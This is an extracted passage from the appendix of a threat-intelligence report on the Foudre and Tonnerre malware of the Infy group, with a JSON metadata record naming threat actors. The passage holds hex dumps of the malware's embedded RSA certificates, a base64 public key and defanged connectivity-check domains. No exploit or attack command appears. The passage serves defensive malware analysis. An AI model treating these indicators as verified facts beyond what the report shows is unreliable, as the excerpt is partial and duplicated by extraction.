DD AD FA 38 11 BB 2C 14 A9 C4 CE B5 FF 8A 5F DC 56 71 01 47 D9 58\r\n43 75 3C 3B C4 F1 9C 5F 0B 47 0F 62 63 84 CC CB 2A 52 1C B2 B2 0E A1 02 CD F1 6A 4E 37 9E 88 C5 ED FE E1 1F\r\n47 84 8F C8 63 0B 24 69 8F 03 00 00 00 01 00 01\r\nFoudre 20 embedded public key\r\nWoerfulTgpMb2NrQm94MwEAAAADAAEAABXerthNt8KS196wHV642+QKKJC26QULYOEd+Qqu6m0VBNHVBWpQ0cROPgOoKU4ibJR9ZntJGJbBUdW+8ykxY2iB7WNay98Y+O1IvGgP+\r\nChecking connectivity and current date\r\nwww.msn[.]com\r\nwww.breakingnews[.]com/feeds/rss\r\nwww.france24[.]com/en/top-stories/rss/\r\nSource: https://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nhttps://research.checkpoint.com/2021/after-lightning-comes-thunder/\r\nPage 17 of 17\n\nRSA Certificates Tonnerre Public Certificate file content \n4E 0A 4C 6F 63 6B 42 6F 78 33 01 00 00 00 03 00 01 00 00 51 F0 00 D8 97 48 C7 5B 0A BF F4 98 AB C6 1F 28 13 FC\nD7 C5 5E E4 A6 71 E5 41 8E F4 8D 41 BD 8F 4C E3 EF 3F FC 8C BD B9 4F 55 F6 E5 0F 83 D9 D3 D4 56 FC DC D0 BE\n5B 5F 29 37 0F 87 43 5E D0 1C 2F 49 8D 2F 88 49 A3 88 DA 4A CE 37 95 81 6C C1 DF 40 1F 43 27 6C A6 11 57 E1 8B\nBA B2 1A 9F 1D F0 F5 C0 18 64 6F CB D0 07 8A 9C 39 87 A3 77 0E 33 C2 6F 6E FA 89 73 9B 4A 92 90 79 58 07 F4 79\nA9 0F 30 9D 9C 28 24 3E 3B 6B 3B 69 87 14 AF 99 FC 9F 24 47 BC BB 2A A1 2A 68 4F B4 5E E5 E5 5C C8 24 DA D6\n8B 40 F2 5E EA D5 C9 EE 42 5D B0 43 A4 C3 EE 91 8E 54 AE E8 A0 26 4C 11 8F 23 1C 71 43 73 07 99 98 9A 00 59 8A\n96 42 0F C1 15 A4 E0 39 0F 17 E6 17 7B B6 54 1D 83 61 A1 8F D2 1A 72 04 33 67 C6 92 7E 2B F6 C2 24 C6 92 D9 94\n19 09 8C 5C 5C 2A 4E 6A AD F6 EA CD 33 5F 6C E5 40 BC 03 00 00 00 01 00 01 4E 0A 4C 6F 63 6B 42 6F 78 33 01 00\n00 00 03 00 01 00 00 3B 88 FB D8 1F C2 3F 35 1F 2D EB 36 D6 16 C2 DE 64 2C 5A 8C 6F FD 0E B7 DB 17 37 D4 1A\n1A 55 A7 A5 0B 28 F3 01 31 EE 5C A5 5B 50 69 E5 94 63 95 2C 9D E4 1D D7 3A 87 36 C7 AE 81 80 F0 25 6A 7C BB 48\nCE 9D E3 74 13 B4 7C 15 56 62 08 5C AB F2 4B 68 2A C3 60 80 CB 2F FD 88 85 32 63 43 9C 47 90 89 2A A3 CF 5A 89\nA5 69 19 9E 81 94 0C C3 7E 9B A6 80 95 CC 01 CF D4 44 6F FA CC E1 07 0D 17 24 EB 97 6C 8D CC 35 0A C0 51 12\nF4 C8 E7 E9 1F 4C 42 50 DE 5C 8A 94 24 71 8A C9 B2 D0 C5 75 0B 82 1C 36 5A C6 B9 10 B4 6E 21 F3 FD E8 B1 A5\n4A C8 DA 4B 74 99 F8 29 47 0C 5E E4 EC 9F DD AD FA 38 11 BB 2C 14 A9 C4 CE B5 FF 8A 5F DC 56 71 01 47 D9 58\n43 75 3C 3B C4 F1 9C 5F 0B 47 0F 62 63 84 CC CB 2A 52 1C B2 B2 0E A1 02 CD F1 6A 4E 37 9E 88 C5 ED FE E1 1F\n47 84 8F C8 63 0B 24 69 8F 03 00 00 00 01 00 01 \nFoudre 20 embedded public key \nWoerfulTgpMb2NrQm94MwEAAAADAAEAABXerthNt8KS196wHV642+QKKJC26QULYOEd+Qqu6m0VBNHVBWpQ0cROPgOoKU4ibJR9ZntJGJbBUdW+8ykxY2iB7WNay98Y+O1IvGgP+ \nChecking connectivity and current date \nwww.msn[.]com \nwww.breakingnews[.]com/feeds/rss \nwww.france24[.]com/en/top-stories/rss/ \nSource: https://research.checkpoint.com/2021/after-lightning-comes-thunder/ \n Page 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://research.checkpoint.com/2021/after-lightning-comes-thunder/" ], "report_names": [ "after-lightning-comes-thunder" ], "threat_actors": [ { "id": "bf773c52-830b-46e3-aa61-58c82eb323ee", "created_at": "2023-01-06T13:46:39.135077Z", "updated_at": "2026-04-10T02:00:03.226187Z", "deleted_at": null, "main_name": "Nazar", "aliases": [ "SIG37" ], "source_name": "MISPGALAXY:Nazar", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f3b19931-3751-4ece-a235-15b397951dc2", "created_at": "2022-10-25T16:07:23.889537Z", "updated_at": "2026-04-10T02:00:04.780137Z", "deleted_at": null, "main_name": "Nazar", "aliases": [ "SIG37" ], "source_name": "ETDA:Nazar", "tools": [ "Distribute.exe", "EYService", "GpUpdates.exe", "Microolap Packet Sniffer", "TCPDUMP for Windows" ], "source_id": "ETDA", "reports": null }, { "id": "f763fd1f-f697-40eb-a082-df6fd3d13cb1", "created_at": "2023-01-06T13:46:38.561288Z", "updated_at": "2026-04-10T02:00:03.024326Z", "deleted_at": null, "main_name": "Infy", "aliases": [ "Operation Mermaid", "Prince of Persia", "Foudre" ], "source_name": "MISPGALAXY:Infy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "59c9f31b-e032-44b9-bf3b-4f2cb3d17e39", "created_at": "2022-10-25T16:07:23.734244Z", "updated_at": "2026-04-10T02:00:04.731031Z", "deleted_at": null, "main_name": "Infy", "aliases": [ "APT-C-07", "Infy", "Operation Mermaid", "Prince of Persia" ], "source_name": "ETDA:Infy", "tools": [ "Foudre", "Infy", "Tonnerre" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434665, "ts_updated_at": 1775792182, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6443539cc59d9c8f4d6b3fa0ff38df5d7a02fa82.pdf", "text": "https://archive.orkl.eu/6443539cc59d9c8f4d6b3fa0ff38df5d7a02fa82.txt", "img": "https://archive.orkl.eu/6443539cc59d9c8f4d6b3fa0ff38df5d7a02fa82.jpg" } }